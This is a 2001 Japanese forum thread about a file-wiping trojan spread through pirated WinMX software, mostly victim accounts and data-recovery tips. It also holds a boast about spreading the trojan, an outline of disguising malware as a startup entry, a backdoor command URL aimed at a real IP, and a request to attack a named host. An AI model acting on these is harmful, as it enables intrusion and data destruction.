私の場合、家族で写したデジカメの画像(jpeg)は98%復旧、ワード文書&一太郎文書は完
全復旧、これはホント驚きでした。私はHPを作っていて作りかけのデータも入ってい
たのですが、gifファイルに関してはほぼ復旧、htmファイルに関しては復旧できるもの
の余計なデータも挿入されて完全な状態には戻りません、が無くなるよりましです。
あと家族で旅行に行った際デジカメの動画機能で撮影したmovファイルは復旧無理。い
くつかあったmp3ファイルはなぜかいくつかに分割されていましたが再生可能。zipなど
のアーカイブファイルはサイズが合わず復旧不可能ですが、ファイルサイズを任意に変
えることで復旧の可能性はあります。

細かい点について補足します。上記「回収ディレクトリ」にて無事復旧できたファイル
ですが、復旧したファイルはファイルサイズがすべて「1057164byte」などと実際のファ
イルサイズよりかなり大きく、仮のファイルサイズとして復元されてしまいます。これ
を正しいファイルサイズに戻す作業が必要になります。
htmlファイルについてですが、本来</html>で終わるところ、それ以後に他のファイル
から割り込んできたデータが延々と続くので、これを削除してやる必要がありますが、
ファイル数が多いと手作業でやるのはしんどいので、エディタのマクロ処理などで自動
処理で乗り切ります。

またjpgやgifファイルについても、一度画像編集ソフトなどで開いてそのまま保存する
と元の正式なファイルサイズに戻るのでこれも自動処理で乗り切ります。

アーカイブファイルの復旧には、データサイズを元のファイルサイズよりも大きくしな
いとすべてのデータが復元できないのでファイルサイズを変更します。また変更した後
解凍ソフトで「ファイルが壊れている」とエラーを返されることがあります。この場合
WinRARなどの壊れていてもアーカイブの中身を覗けるソフトなら、復旧の可能性大です。
あとメーラーはBecky!という方もいると思いますが、最近発売されたFINALDATA エンタ
ープライズNT/2000版ならVer1形式に関しては復旧可能だそうですが、Ver2については
対応していないようです。私はいずれ対応することを期待して被害にあったHDDはそのま
まにし別なHDDを利用しています。

私の場合ほとんどファイルが復活できたのは幸運でした。エラー発生後すぐに電源を落
としその後何もしなかったのがよかったのだと思います。ともかく今回のことでファイ
ルのバックアップがいかに重要かということを思い知らされました。

長文失礼しました〜

363 :データが消滅:01/10/17 19:13
ただFINALDATAを使ってもファイルが復活できなかったとこのスレの
ログにもあるようなので、あくまで一例として読んでください。

364 : :01/10/17 20:15
>>361-362
んなこたー全部わかってるっつーの。
ここセキュ板だぜ?

365 :名無しさん@お腹いっぱい。:01/10/17 20:17
それよりも、割れ以外のところから感染したというのが怖い。
いったいどこから感染したのか?
361さんにはそれをぜひ割り出して欲しい。

366 :名無しさん@お腹いっぱい。:01/10/17 20:26
>>364
まぁそう言うなよ。俺はこの板にほとんど来ないので、タメになったよ。
361-362サンクス

367 :名無しさん@お腹いっぱい。:01/10/17 20:28
>>361-362
長げ〜よ。

368 :データが消滅:01/10/17 20:43
>>364,367
ごめんね。もう来ません

369 : :01/10/17 20:57
確かに文章長すぎ

370 :ががが:01/10/17 21:01
それより、聞いてくれよ。
俺がwhismng.exeを組み込んだファイルを
今日1日で40人以上が持ってったぜ。
やっほ〜、もっと頑張ろうっと。

371 :N374?:01/10/17 21:17
>>370
セトアプ.exeのレジストリ書き込み値、そこはかとなくいぢっといたかね?
(w

372 :名無しさん@お腹いっぱい。:01/10/17 21:18
>>370
一瞬例のコピペかと思ったぜ

373 :名無しさん@お腹いっぱい。:01/10/17 21:58
>>368 元気そうで良かった。FINALDATAのエンタープライズ版が使える環境であったことが一命を取り留めたって事で。
バックアップは忠実に取ったほうがいいね。

374 :( ◆h5s/vIfE :01/10/17 22:47
>>373
FinalData Enterprise の NT/2000版
早く誰か共有しろやごるぁ(#゚Д゚)

インターネットマーフィーの法則 その1
「バックアップをすると必ず直後にやられる。」

375 :名無しさん@お腹いっぱい。:01/10/17 22:52
Setupファイルを見て、トロイが仕掛けられていないか確かめる方法は無いのですか?
今は、レジストリだけ手動で確認しています。

376 :名無しさん@お腹いっぱい。:01/10/17 23:27
>>374
それは違うな。正しくは
「そろそろバックアップを取ろうかなと思っている時に限ってやられる」だ。

377 :名無しさん@お腹いっぱい。:01/10/18 00:07
>>376に1票

378 :N374:01/10/18 00:21
>>374
そうか、、、アレに組み込めば。。。ス、素晴らしい(・∀・)

379 :名無しさん@お腹いっぱい。:01/10/18 04:02
※皆さん、煽りは完全放置でいきましょう※

380 : :01/10/18 09:48
とりあえず、このスレは上げることに意味がある

381 :名無しさん@お腹いっぱい。:01/10/18 17:22
誰かまとめてちょ

382 :名無しさん@お腹いっぱい。:01/10/18 17:53
まとめても意味がないよ。日々増えてるんだから。
割れには全て入っていると思ってかかったほうがいい。

383 : :01/10/18 23:40
煽る気じゃないけど、ウィルス仕込む奴の楽しさを知ってしまった。
ホイスラーみたいな自己増殖力の弱いやつなんて
仕組みはむちゃくちゃ簡単じゃん。
最初こいつをいじって遊んでたんだけど、
どうやって組み込むかってのを考えるのが意外や意外、むちゃくちゃ面白い。
システムディレクトリにファイルつくってレジストリに登録、を、
レジストリのスタートアップに登録されているファイルと置き換えにして、
ちょっとこってアイコンはもとのままにして、
最初の起動もたまにしか起動しないものにしてみたり。。。
みんなも一回やってみ。

384 :名無しさん@お腹いっぱい。:01/10/18 23:46
>>383
マルチすんな馬鹿

385 :生まれてすみません:01/10/19 00:08
>>383
そのうち、いいVirSite見つけたら、、、以下略
まぢめな?所は、色んなパーツやチュートリアル有るし。。
容量少ないから、色々いぢるには面白いかも。、、にしては奥深いし。
他人に迷惑掛けなきゃ良いんじゃない?
I-WORMいぢる時は要注意だけど。
・・・それで得た知識、防御に回せば誰も文句は言えないよ。

386 :生まれて・・・:01/10/19 00:20
>>384
マ、マルチ・・・・・
う、ぅぅぅぅぅぅぅぅっ

387 :名無しさん@お腹いっぱい。:01/10/19 04:42
>>383
マルチポスト一生懸命だね。
「プロフラム」を入れ替えるんだろ?(藁

388 :七誌:01/10/19 08:38
>>387
そうやって言ってる奴の所に感染すると思われw

389 :名無しさん@お腹いっぱい。:01/10/19 09:07
いいからはやくIDとファイル名教えてよ。落としに行くからさ。

390 :間抜け:01/10/19 10:44
昨日どっか(覚えてない)のスレで
『上をクリックしたらPC逝きます』ってあった
おそいよ・・・・・・
何が起きたかわかる人います?

391 : :01/10/19 15:18
http://www.zdnet.co.jp/news/0110/19/b_1018_08.html
一応貼っとく

392 :ヨシムネー ◆ySCq.X1E :01/10/19 15:20
>>391
おお、有益な情報サンクス(w

393 : :01/10/21 19:50
定期上げです

394 :lominans:01/10/22 12:58
33バイト被害がこちらでもございました。(泣)
whismng.exeでした。

うちの被害は

Cドライブ:
 デスクトップ直置きファイル>消滅
 デスクトップにフォルダ作って置いてあるファイル>全て正常
 マイドキュメントフォルダ内ファイル>フォルダだけ残し全て消滅
 それ以外>正常。ただし、レジストリのWindows\Current〜\run\に
      whismng /next (うろ覚え)が書き込まれていた。
Dドライブ:全フォルダが、フォルダのみ残し、全滅
Eドライブ:ルートのフォルダの8中5が、フォルダのみ残し、全滅
      残りの3のうち2において、それぞれサブフォルダ1つずつが
      フォルダのみ残し全滅、他は正常
      他1は正常。
こんな結果となりました。あはは はは。

395 :lominans:01/10/22 13:00
>>394
記述漏れあり。
D:とE:のルートにあるファイルは全滅でした。

396 :名無しさん@お腹いっぱい。:01/10/22 13:37
>>394
DとEの被害が中途半端なのは、
消している作業中にそれに気がついて電源を落としたりしたからじゃない?
俺も途中で切ったので半分くらいは残ってた。

397 :名無しさん@お腹いっぱい。:01/10/22 13:40
>394ソース何?

398 : :01/10/22 14:42
何のソフトをインストしたのかが知りたい

399 :名無しさん@お腹いっぱい。:01/10/22 17:07
Adobe dimensions 3.0J
Adobe Streamline
Acrobat5J
午後のこーだ
Virturl PC 4.1
AI将棋2002.zip(34,840,870バイト)
Adobe PageMaker6.0
WINCDR6

リスト出してみた。
参考までに・・・・

400 :名無しさん@お腹いっぱい。:01/10/22 17:30
MXは危険だ
やはり割れはWebに限る

401 :名無しさん@お腹いっぱい。:01/10/22 17:31
あと、

Lightwave3D ver7

も追加ね。

402 :すばらしい:01/10/22 19:18
それにしてもここは名刷れですね。(途中ちょっと荒れてるけど)
進行役が実にすばらしいんですね。(さながら国際A級のサッカーの主審のよう)

403 :名無しさん@お腹いっぱい。:01/10/22 19:40
>>402
進行役なんているか?
いても複数だと思うよ。

404 :  :01/10/22 22:12
定期的に、危険ソフトのリスト希望〜♪

MXにも危険ソフトのリストファイル流れてるけど、
なんか、2chの方が情報が多い・・・・・・(笑

405 :名無しさん@お腹いっぱい。:01/10/22 22:21
リストに頼るほうが危険だと思うが・・・・

406 :名無しさん@お腹いっぱい。:01/10/22 22:46
キケンでないものの md5 か CRC でも挙げたほうがよくないか?

407 :PT:01/10/23 00:40

この被害ここまで広がっていたのですね。実は私もWhiterトロイの木馬の被害にあ
った1人です。
私の場合9月9日に感染し、フォルダ以外の全ファイルを削除されてしまいました。
http://ton.2ch.net/test/read.cgi/sec/997350129/
の649から「データが消滅」という名で書き込んでいるのが私です。9月9日の時
点で被害に遭っている方が3〜4人程度しかいなくあまり相手にされませんでした。
相手にされなかったので新スレもたてないでおきました。

皆さんMXという共有ソフトを入れてそれが原因で被害に遭われた方が多いようで
すが、私はMXというのはやったことがないし、私の場合意味不明な英文メールを
開いてしまったのが直接の原因だと思います。とにかくフォルダ以外のファイルと
いうファイルは全消去(CドライブDドライブ共に)されたので真っ青になりました。

ともかくデータが復旧可能なのかということですが・・・以下の方法はFAT32環境での
話です。(NTFSでも復旧可能なFINALDATAも8月末発売されました)

ファイルの復活にはFINALDATA(http://www.finaldata.ne.jp/)を使います。ただし今
回の被害の場合スタンダード版では復旧は無理でした。そこで業務用のエンタープラ
イズ版を使用します。私の場合、たまたま勤めている会社のPCに導入されていたの
で上司の了解を得、復旧作業に当たりました。

まず、被害に遭った場合、Windowsがまだ生きている場合は何もせず安全な方法で終
了してください。決してデフラグなどは実行しないこと。終了できない場合は強制
的に終了することもやむ終えないです。また被害にあったHDDにwindowsを上書きイン
ストールするのも厳禁です。で、もう一台データが消えてもかまわないHDDを用意
してこのHDDをマスターに繋ぎます。被害にあったHDDをスレーブに繋いでくだ
さい。で、マスターのHDDから起動させます。起動したらFINALDATAエンタープライ
ズ版をインストールしてもいいしCD-ROMからそのまま実行どちらでもかまないので起
動させます。あとは被害にあったHDDに対してファイルの復旧を実行してください。全
クラスタを検索範囲にした方がいいと思います。

HDDの容量によって時間が結構かかると思います。終了すると左のメニューから復旧可
能なファイルが参照できるようになります。通常の被害だとルートディレクトリ以下か
ら復旧可能ですが、今回のトロイは被害が甚大なのでどのファイルも33kbなような大
きさになってしまいこのままでは復旧は無理です。しかしエンタープライズ版では致命
的に被害を受けたファイルでもデータさえ残っていれば「回収ディレクトリ」以下から
復旧可能です。復旧できる可能性のある拡張子を持つファイルは以下の通り。

.AVI.BMP.CDR.DAT.DBF.DBX.DOC.DWG.DXF.EML.GIF.HTM.JPG.JAW.JBW.JSW.JXW
.MBX.IDX.MBX.MBX.MDB.MID.MOV.MP3.MPG.PBL.PCT.PCX.PDF.PSD.SF2.RM.RTF
.tar.tar.gz.TGA.TIF.WAB.WAV.WMF.WRK.ZIP
上の拡張子には出てきませんが、エクセル形式のファイルや一太郎11形式のファイル
も.docと拡張子は変わってしまうもののファイルさえ壊れていなければ復旧可です。

408 :名無しさん@お腹いっぱい。:01/10/23 02:20
>407
あの〜、その話確か前にも聞いたんですけど
被害に遭われてお気の毒だと思いますが
そんな事とっくにわかってるんで
よそでやって下さい。

409 :名無しさん@お腹いっぱい。:01/10/23 03:36
33バイトウイルスって
Win2Kのみに感染するんですか?

410 :名無しさん@お腹いっぱい。:01/10/23 08:15
>>408
コピペにマジな反応するなよ・・・
別人がやってるんだろ。本人はもういないよ。

411 : :01/10/23 18:55
ソフトの作者が怒って毒混ぜてたとしたら笑えるな

412 :名無しさん@お腹いっぱい。:01/10/23 19:09
>>411
WinGlooveとか

413 : :01/10/23 19:10
>>411
笑えないよ

414 : :01/10/23 23:04
33バイトウイルスはOSの種類に関係なく感染するんですか?

415 :名無しさん@お腹いっぱい。:01/10/24 01:18
http://www.durian-jp.com/04/html/main1.html
思わずwhismng.exeを検索しちゃったよ。

416 :名無しさん@お腹いっぱい。:01/10/24 02:03
>415
どんなウィルス?

417 :名無しさん@お腹いっぱい。:01/10/24 02:09
>>416
単なるエロサイト。開いて見ればびびった理由がわかる。

418 :名無しさん@お腹いっぱい。:01/10/24 02:14
>417
( ̄○ ̄)ア( ̄о ̄)ホ!!
ウソ八百だなw
逝ってよし!

419 :名無しさん@お腹いっぱい。:01/10/24 08:02
>>418
ウソじゃないけど、いまはとじてるようだ。
ADSMなんちゃらがDドライブを消すとかいうアプレットが
開くんだけど、実際はなにもしないってこと。

420 :名無しさん@お腹いっぱい。:01/10/24 10:45
>>419
そかそか。
とじてたのね。
このズタズタウィルス

421 :名無しさん@お腹いっぱい。:01/10/24 18:11
ふぅ。昨日やられたよ。33バイト。懲りずにMXでFinalDataエンタープライズ
のNT,2000を探す。こっちは空っぽだから、交換も出来ないし、落とし始めると
ROMとして切断される。ふぅ。懲りないよな。復旧しても割れに手を出す自分が見える。
ということで、MXでエンタプライズさがそっと。

422 :名無しさん@お腹いっぱい。:01/10/24 22:13
>>421
鶏なみの学習能力?

423 :名無しさん@お腹いっぱい。:01/10/24 22:33
カス!すごいウイルスよこせ!

424 :名無しさん@お腹いっぱい。:01/10/24 23:35
すっげー面白いスレ。一気に読んじゃったよ。
MXはどーも引っかかるところがあったんで手を出さなかったけど、正解
だったね。
 HD前消し喰らったら俺だったらもう立ち直れないだろなぁ…。合掌。
 

425 :名無しさん@お腹いっぱい。:01/10/24 23:52
>>424
俺もMX引っかかる点があって、ずっとやってなかったんだけど、
友達が来たときに偶然やってみて、それから一週間後に200GB飛んだよ・・・

426 :名無しさん@お腹いっぱい。:01/10/25 03:00
名スレの予感・・・

427 :名無しさん@お腹いっぱい。:01/10/25 03:48
しゃれにならない名スレだ・・・

428 :名無しさん@お腹いっぱい。:01/10/25 05:01
>>424
俺も、そう思ってMX入れてなかったけど、
ちょっと探し物あったから入れようと思ってたところだった。
やっぱ、自力でさがそっと

429 : :01/10/25 05:06
>>425

♪ウィルス被害♪ 自慢スレ
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1003953769

430 :名無しさん@お腹いっぱい。:01/10/25 08:29
MP3とか動画だけなら大丈夫でしょ?

431 :名無しさん@お腹いっぱい。:01/10/25 13:52
MXインストールしようとしたとき英語がウザくてやめちゃったけど…。
お馬鹿でよかった。
 平気で割れをインストールするからなぁ、漏れ。ライトウェーブ7なんて
絶対インストールしてたところだね(苦笑)。
 

432 :名無しさん@お腹いっぱい。:01/10/25 14:24
>>431
別にライトウェーブ7だって、

・インストール後、再起動する前にwhismng.exeを削除

すればウイルスの影響無しに使うことが出来るぞ。

433 :名無しさん@お腹いっぱい。:01/10/25 15:38
>428
俺も同じ。
MXダウンして入れようか迷ってたとこ。
このスレに感謝。

434 :名無しさん@お腹いっぱい。:01/10/25 18:05
割れ物って何を指すの?厨房です、まじ教えて下さい

435 :名無しさん@お腹いっぱい。:01/10/25 18:12
>>434
われもの【割れ物・破れ物】
(1)割れやすい物。特に、ガラス器・陶磁器など。「―注意」
(2)割れた物。

436 :名無しさん@お腹いっぱい。:01/10/25 18:29
warez=商用ソフトの違法コピーのこと。
アングラな物

437 :名無しさん@お腹いっぱい。:01/10/25 19:11
というか、MXだけが感染源じゃないよ、、。サードパーティーサイトに置いてあるMX本体だって危ないだろうし、web割れずだって危ないし、あのにFTPなんかめちゃめちゃ危険だよ。MXで割れやらないのは対策になってないべ。

438 :sambofigaro:01/10/25 19:26
一応感染容疑のファイルリスト作って共有しとこっと。誰もいらないだろうけど。

439 :名無しさん@お腹いっぱい。:01/10/25 19:34
http://www5.tok2.com/home/violet/violet_rose.top.htm

440 :名無しさん@お腹いっぱい。:01/10/25 19:40
http://www5.tok2.com/home/violet/violet_rose.top.htm
よかったら来てねv

441 :名無しさん@お腹いっぱい。:01/10/25 20:07
2ちゃんはクラッカー多いな。

442 :名無しさん@お腹いっぱい。:01/10/26 13:42
結構出回りだしてるんだろうからもう我系どこでも危ないんだろうね。
鬱。

443 :名無しさん@お腹いっぱい。:01/10/26 14:19
>433
MXやってなくてもやられたって話あるし
WEBで2次配布やってんのは疑った方がいいぞ。

444 : :01/10/26 14:30
そうだね。

MX = 危ない

とか見当違いなことを言ってる奴は、いつかやられると思う。
何が危険なのか全然わかってない。

445 :名無しさん@お腹いっぱい。:01/10/26 15:03
Win2kなどでその怪しげなアプリをインストールしたあとusers権限でログインすれば
フォーマットなどの危険なことはさけれらないでしょうか?
users権限はあまりに不便なので環境がかたまるまでPowerUsersで使用してる
ことが多いので不安です。

446 :名無しさん@お腹いっぱい。:01/10/26 16:22
>>445
関係ないと思う。
というか普通アドミニで使わない?

447 :名無しさん@お腹いっぱい。:01/10/26 16:40
PGPディスクでも入れとけ。
大事なデータの入ってるDISKは。
それで防げるんじゃないの?

448 :名無しさん@お腹いっぱい。:01/10/26 18:57
>>446
そういうやつ多いな。でもなUNIXだって普段rootで作業せんだろ?
普段アドミで作業するのは避けよう。

449 :名無しさん@お腹いっぱい。:01/10/26 19:02
>>445
わからんがPowerUserでインストールしたらウイルスも
PowerUser権限で動く危険は高いと思うけどな。

450 :名無しさん:01/10/27 00:48
age2

451 :名無しさん@お腹いっぱい。:01/10/28 08:55
なんか性病みたいな感じだNe!

452 :名無しさん@お腹いっぱい。:01/10/28 21:36
つーか、HDDは物理的に壊れない限り、復旧可能。
フォーマットしても、実は、消えていない。

453 :名無しさん@お腹いっぱい。:01/10/28 21:38
>>452 上書きはさすがにきつい。フォーマットとは違うから。

454 :鬼畜:01/10/28 21:53
ここ見たらウィルス作りたくなってきた。

455 : :01/10/28 22:44
>>454
外にださないでネ♪

ちゃんと自分のカゴの中で飼いましょう!(笑

456 :名無しさん@お腹いっぱい。:01/10/28 22:48
MXでwin版のぷよぷよもやばい。注意されたし。

457 :_:01/10/28 23:12
>>456
ぷよぷよのサイズわからん?

458 :名無しさん@お腹いっぱい。:01/10/29 02:54
>>452

復旧可能って?
おまえこのスレ読んだのか?
このスレのパターンだと
大金はらわんとまともな復旧できねーぞ。

459 :age:01/10/29 10:16
age

460 :Mツトム県奥様濃ゆ軍西米良し村所菊池記念館が水泥棒を止めません。:01/10/29 10:36
http://211.13.210.40/scripts/root.exe?/c+dir+"c:\

株式会社サイバービジョン (CyberVision Co.,Ltd.)
CV-NET [211.13.210.0 <-> 211.13.210.127] 211.13.210.0/25
メディアエクスチェンジ株式会社 (Media EXchange, Inc.)
SUBA-200-C07 [サブアロケーション] 211.13.210.0

211.14.241.
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.14.240.0-211.14.241.0
b. [ネットワーク名] KATCH-NET
f. [組織名] 株式会社キャッチネットワーク
g. [Organization] KATCH Network Inc.
m. [運用責任者] TK998JP
n. [技術連絡担当者] YO349JP
p. [ネームサーバ] ns.katch.ne.jp
p. [ネームサーバ] ns2.katch.ne.jp
y. [通知アドレス] db-admin@katch.co.jp
[割当年月日] 2000/09/26
[返却年月日]
[最終更新] 2001/03/28 11:50:23 (JST)
okayama@katch.co.jp

461 :cj3049748-b.nrima1.kt.home.ne.jp:01/10/30 18:09
cj3049748-b.nrima1.kt.home.ne.jp
この常時接続のアポーのパソコンをウイルスで壊して

462 : :01/10/30 18:41
>>461
なんで?

463 : :01/10/30 20:02
それができるほどスキルがあれば、こんなとこにはいないよ

464 :名無しさん@お腹いっぱい。:01/10/31 00:57
落としたファイルは3ヶ月ぐらい寝かせて置くって言うのはダメ?
でウイルススキャン・・・

465 : :01/10/31 11:09
>>464
たしかに安全度は増すけど
「ウィルスは未知のモノである」っていうからさ
それでも駄目な場合もあるよ

466 :名無しさん@お腹いっぱい。:01/10/31 16:35
>>452
>つーか、HDDは物理的に壊れない限り、復旧可能。
>フォーマットしても、実は、消えていない。

何にも知らないくせに書き込むなよ。
このウイルスは単なるフォーマットみたいな甘いものじゃないんだよ。
良く読め。
フォーマットなら復旧できることは常識だ。誰でも知ってる。

467 :くるり:01/11/01 00:23
旦那のPCが同じようなウイルスで逝きました。
ここに書いてあるような症状と似ているのですが・・・・
同じ思いをされた方がもしいらっしゃれば。

まず最初にデスクトップに『舞』という名のアイコンが無数に増えていき、
なぜか同時にメディアプレイヤーの更新ダイアログも立ちました。
何も実行した覚えはなく、
MXでCodec集とモー娘の動画をDLしている途中でした。
『舞』を解凍しますというダイアログが急に出たと思ったら
アイコンが無数に増え、マウスが動かなくなり固まりました。
再起動すると、BIOSから先に進まなくなり、
結果、Me再インストールとなりました。
インストール後、C・Dドライブ共にすべてのファイルが1バイトとなっており
めちゃめちゃに壊れておりました。
ファイナルデータを使いましたが復旧は無理でした。
Linux、VisualBasicに至るまで仕事で必要なものまですべて破壊、
激しく鬱になっております。

動画『ザ・ピース』(180M近辺)・Codec集には気をつけてください!
相手はT1の環境だったと言うことを覚えています。

只今少しづつ復活させております。
MXの怖さを震撼させられる出来事でした。
旦那とLANにしてなかったのが不幸中の幸いでしょうか…。

468 : :01/11/01 00:34
疑問がひとつ

>何も実行した覚えはなく

この点が腑に落ちない

469 :名無しさん@お腹いっぱい。:01/11/01 00:36
>>467
それも怖いなぁ・・・
MPEGを再生すらしていないのに勝手に実行?

>『舞』を解凍しますというダイアログが急に出たと思ったら

この後、イエスを押したんですか?
それとも問答無用で開始?

470 :くるり:01/11/01 00:46
>>468さんへ
何も実行した覚えはなく・・・
MXでダウソしている以外は、という意味です。
DL中ということもあり、
ハッキングではないかとも考えたのですが…

>>469さんへ

解凍しますのあとは問答無用で勝手に開始されました。
マウスも動かなくなり、恐ろしい速さで破壊の轟音が…
強制終了をしようとしても破壊に対する処理の方が先で
受け付けてくれなかったですね…
『舞』なんて漢字が出てくるのは日本産だからかな。
mai_004110というようなアイコンが死ぬほど増えていきました。

471 :名無しさん@お腹いっぱい。:01/11/01 00:53
>>470
始まったらすぐにリセットボタンを押しちゃえば、被害が抑えられますよ。


うーんしかし、かなり高度な手でやられたような感じもしますね。

472 :名無しさん@お腹いっぱい。:01/11/01 01:13
>470
>『舞』という名のアイコンが無数に増えていき
>すべてのファイルが1バイトとなっておりめちゃめちゃに壊れておりました

この辺りから察するにここで語られてる33バイト
ウイルスでは無いような気もします。
漢字で「舞」ということは国産かチュン産でしょうか?

もしかして33バイトが進化したんですかね?
だとしたら恐い事です。

473 :名無しさん@お腹いっぱい。:01/11/01 01:23
ハックされたんじゃないの?

474 :名無しさん@お腹いっぱい。 :01/11/01 01:37
こーゆーのって、アンチウイルスソフトを入れてても防げないのかな?

475 :名無しさん@お腹いっぱい。:01/11/01 06:45
ハックより時限式の方が可能性は高くない?

476 :_:01/11/01 08:29
聞いてるとかなり怖いのでも、もせオンリーで逝こう・・・・
時限式って防ぐことできるのか?

477 : :01/11/01 09:36
まぢだとしたら時限式かも
証拠が残ってないのがイタイ
33バイトのヤツは、ウィルスそのものを大事に持ってたヤツがこのスレにいたから
しっかりした情報が入ってきたけど、
>>467のは、これじゃああまりにもわからないことが多すぎる
なにに気をつけたらいいのかさえあやふやだし

478 : :01/11/01 09:37
「メヂアプレイヤーの更新ダイアログ」ってのはどこかで出てきたな

479 : :01/11/01 09:39
>>1のことだった「更新ダイアログ」
すんまそ、大ボケだ

480 :くるり:01/11/01 12:56
みなさま、ありがとうございました。

>>471さんへ
リセットボタンですか…ありがとうございます。
高度な手・・・ですね。

>>472さんへ
漢字のアイコンでした。
漢字を使う国というのは限られているけれど…
舞(Mai)という読み方をそのままファイル名にしていたので
やはり日本産でしょうか・・・・本当に不気味でした。

>>473さんへ
ハック…P2Pだからありえるかなとも思っておりますが
こんなに破壊的なことが出来るのでしょうか・・・
横で見てても怖かったです。

>>474さんへ
アンチウイルスソフトは
ノートンのが起動しておりました。弾いてはもらえませんでした。
(IPAには申告済み・・
  MXとは書けないのでWebよりフリーをDLと書いた。)

>>476さんへ
今回もせ動画も同時DL中でしたので
旦那と違ってもせオンリーの私としてはかなりショックでした。
あまりないバイト数のもせも注意しようと思います。

>>475さんへ
時限式というのもあるのですか…
本当に爆弾ですよね〜〜〜!(x_x;)

>>477さんへ
何に気をつけたらいいかあやふや…
そうですね。
ノートンアンチウイルスを入れて監視しつつ
MXでDLしている途中に自動で起動されて破壊されたので
このファイル名とMXに気をつけてねとしか言いようがありませんが
すべて事実ですし激しく鬱です…
Codec集とモー娘の『ピース』の動画です。
このどちらかに関係していると思います。

>>478・479さんへ
(^-^)なんだか、和みました。
破壊された領域の広さに殺伐としてましたので…(x_x;)

481 :名無しさん@お腹いっぱい。:01/11/01 13:10
>>480
時限式と考えると、他に思い当たる節はありませんか?
今までに、一度も割れソフトをインストールしたり実行したりしていませんか?

482 :くるり:01/11/01 13:20
>>481さんへ
実行、してますね…
時限式と考えると心当たりはあります。
アンチウイルスでは弾かれなかっただけでしょうか。
最近はDLしてなかったようですが…
最近インストしたのはVisualBasicくらいだったかもしれません。

でもウイルスのデータベースを拝見しても
『舞』というアイコン増殖型のウイルスはひっかってこなかったです。
何かの亜種か新種かもしれないですね。
ありがとうございます。

483 :名無しさん@お腹いっぱい。:01/11/01 13:28
>>480
きつ言い方かもしれんが、>>480 の思い込みばっかりで
全然肝心な点がわからない。
Codec集かモー娘の『ピース』の動画が原因と言い切れる根拠は?
もうちょっと原因について検証してほしかった。

ちなみにその「舞」はここの >>1 とは違うウィルスだと思う。
ちゃんとこのスレ最初から読めと言いたい。小1時間言い続けたい。

484 : :01/11/01 13:52
とりあえず拾ったモノを思い出せる限り書いてよ
VisualBasicはどこで拾ったのかとか
ほかに割れ物やってたとか

原因がわかれば、防衛策も練ることができるし
初めてウィルスにやられて、へこんでるだろうし、動転してるだろうけど
ここは冷静になって、思い出して欲しいな

485 :名無しさん@お腹いっぱい。:01/11/01 14:09
なんか動画が原因じゃなさそうな感じだな。

486 :名無しさん@お腹いっぱい。:01/11/01 14:19
OSをマルチブートしている場合なら、
データが破壊されてるな、と思った瞬間にPCを強制終了させて、
別のOSを立ち上げてウイルスを除去すれば被害は少なくなるのでは、
と思うのですが、いかがでしょうか。

487 :名無しさん@お腹いっぱい。:01/11/01 14:35
>>486
うん、別にあたりまえの話だと思うよ。
強制終了よりは、リセットボタンのほうがいいけどね。

488 :名無しさん@お腹いっぱい。:01/11/01 14:42
338 名前:心得をよく読みましょう :01/10/14 22:17 ID:5r0xorkP
ひろゆきもそろそろ管理人としての姿勢を見直すべき
珍走団がひろゆきに土下座をさせたのは、荒らしの責任を取らせたのではなく
あくまでも、ひろゆきの電話での態度について落とし前をつけたまで
日本生命やINSIのように、安全を確信できる相手には、イキガッテみて、
珍走団のように理屈の通じない相手には遜って土下座までするようでは
あまりにもカッコワルイ

489 :名無しさん@お腹いっぱい。:01/11/01 15:15
ただファイルDLしただけで感染するウイルスって技術的に出来るの?
NimdaとかはIEのセキュリティホールをついたヤツだよね?
WinMXにセキュリティホールがあるのか?

490 :名無しさん@お腹いっぱい。:01/11/01 15:33
ためしにMXで検索したら、見つかったぞ

[PV]モーニング娘。 ザ☆ピース! (MPEG2).mpg 184616964 (ユーザー名省略) T1 〜

さすがに怖くて手がだせん

491 :質問:01/11/01 15:56
>>467
スキンを変更したWindowsMediaPlayer7を使っている。Y/N?

492 :つーか:01/11/01 17:34
>>467
 マジっぽいネタはやめろや

493 :くるり:01/11/01 19:42
>>483
>>ちなみにその「舞」はここの >>1 とは違うウィルスだと思う。
>>ちゃんとこのスレ最初から読めと言いたい。小1時間言い続けたい。

>ここに書いてあるような症状と「似ている」のですが・・・・
>同じ思いをされた方がもしいらっしゃれば。

あんたこそ揚げ足取るならちゃんと読め。
「似ているのですが」と最初にいってるだろうに。
思い込みはどっちだろうね。カコワル。

>>491さんへ
スキンは変更なしです。
それって関係有るのでしょうか・・・?

>>492
ネタかどうかはあんたに決められることじゃない。
煽りって不細工。うましかうましか。

その時DLしていたものを原因として考えるなら
この動画とCodec集かもしれないね。
しかしほかに原因があるとするならば(時限式を含む)
枝葉末節挙げるとキリが無いです。
ただ、こういう症状のウイルスは存在するのかと思い
ここへ来ました。
心ある暖かな人もいればいろんな人もいますね。
同じ思いをされたときに初めて揶揄の鬱陶しさがわかるんでしょうね。
もう二度とこないと思います。
ありがとうございました。

494 :名無しさん@お腹いっぱい。:01/11/01 19:57
うんこ

495 :名無しさん@お腹いっぱい。:01/11/01 21:00
>>493
というか、その程度の煽りにいちいち腹を立てちゃいかんよ。
2ch経験はあまり無いですか?
あんなのに反応するなんて、ある意味驚いた。

アホは気にしないで、話を続けましょうよ。

496 :名無しさん:01/11/01 21:33
でもまあこれだけの情報じゃ気をつけようもないし
他に似たような報告もないわけだからどうにもならないわな。

497 :名無しさん@お腹いっぱい。:01/11/01 22:59
>>493 は2chもパソコンも初心者か?
MXでDL中(DL後でなく)のファイルが勝手に実行される状況ってあるのか?
もうちょっとよく考えてから書いてくれ。

498 :名無しさん@お腹いっぱい。:01/11/01 23:04
>>497
いやだから、ハックもしくは時限式、って話しになってきているじゃん。
お前こそちゃんと流れを見て書き込め。

499 :名無しさん@お腹いっぱい。:01/11/02 01:38
ハックもしくは時限式、って話しになってきているつーことは
原因不明でこの話は終了?

500 :t:01/11/02 01:48
61.125.112.91 zaq3d7d705b.zaq.ne.jp

501 :名無しさん@お腹いっぱい。:01/11/02 01:51
>>499
まぁ後はくるりさんが時限式の心当たりのソフトを挙げてくれればいいんだけど、
もう来ないみたいだから終了かな?

502 :491:01/11/02 08:18
>>493
http://news.zdnet.co.uk/story/0,,t269-s2083755,00.html

503 :名無しさん@お腹いっぱい。:01/11/02 17:38
493 日本語訳
